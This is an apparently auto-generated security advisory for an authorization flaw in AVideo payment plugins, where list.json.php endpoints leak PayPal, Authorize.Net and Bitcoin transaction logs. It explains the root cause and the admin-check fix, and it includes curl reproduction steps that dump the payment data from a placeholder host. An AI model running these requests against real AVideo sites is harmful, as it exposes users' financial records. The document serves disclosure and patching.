AVideo - Unauthenticated Access to Payment Log DataTables Endpoints via list.json.php
Description
AVideo through version 26.0 contains multiple unauthenticated list.json.php endpoints in payment plugins lacking authorization checks, exposing PayPal tokens, Authorize.Net webhooks, and Bitcoin transaction records. Unauthenticated attackers can retrieve all payment transaction data including agreement IDs, user financial records, and API responses via direct GET requests to vulnerable endpoints.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing authorization check in list.json.php endpoints allows unauthenticated access to payment transaction data."
Attack vector
An unauthenticated attacker sends a direct GET request to any of the unprotected `list.json.php` endpoints, such as `/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php`. The `configuration.php` bootstrap does not enforce authentication, and no `.htaccess` rules protect the plugin View directories [ref_id=1]. The endpoint calls `PayPalYPT_log::getAll()`, which executes `SELECT * FROM PayPalYPT_log` and returns all records as JSON. No authentication, session, or user interaction is required.
Affected code
The vulnerable endpoints are `plugin/PayPalYPT/View/PayPalYPT_log/list.json.php`, `plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php`, and `plugin/BTCPayments/View/Btc_payments/list.json.php`. These files lack the `User::isAdmin()` check that is present in their sibling `add.json.php` endpoints. The advisory lists 21 total `list.json.php` endpoints across the codebase that share this missing authorization flaw [ref_id=1].
What the fix does
The recommended fix adds a `User::isAdmin()` guard at the top of each vulnerable `list.json.php` file, immediately after the `require_once` and `header()` lines [ref_id=1]. If the user is not an admin, the script returns a JSON error object and exits. This mirrors the pattern already used in the sibling `add.json.php` endpoints and in the previously patched Scheduler plugin (commit 83390ab). The advisory states that no patch has been released for these 21 endpoints.
Preconditions
- configThe target must be running AVideo through version 26.0 with the payment plugins installed and accessible via HTTP.
- authNo authentication or session is required; the attacker can be completely unauthenticated.
- networkThe attacker must be able to send HTTP GET requests to the vulnerable endpoints over the network.
- inputThe attacker sends a simple GET request with no special payload or parameters.
Reproduction
Step 1 — Dump PayPal transaction logs (unauthenticated): ``` curl -s 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/list.json.php' ``` Returns all PayPal transaction records including agreement IDs, tokens, payment amounts, user IDs, and full PayPal API JSON responses.
Step 2 — Dump Authorize.Net webhook logs (unauthenticated): ``` curl -s 'https://target.com/plugin/AuthorizeNet/View/Anet_webhook_log/list.json.php' ``` Returns all Authorize.Net webhook payloads including transaction IDs, event types, and payment details.
Step 3 — Dump Bitcoin payment records (unauthenticated): ``` curl -s 'https://target.com/plugin/BTCPayments/View/Btc_payments/list.json.php' ``` Returns all Bitcoin transaction identifiers, BTC amounts, and store identifiers.
Step 4 — Confirm sibling endpoints ARE protected: ``` curl -s -X POST 'https://target.com/plugin/PayPalYPT/View/PayPalYPT_log/add.json.php' # Returns: {"error":true,"msg":"You can't do this"} ```
Generated on Jun 21, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2- github.com/WWBN/AVideo/security/advisories/GHSA-wprj-9cvc-5w37mitrevendor-advisory
- www.vulncheck.com/advisories/avideo-unauthenticated-access-to-payment-log-datatables-endpoints-via-list-json-phpmitrethird-party-advisory
News mentions
0No linked articles in our index yet.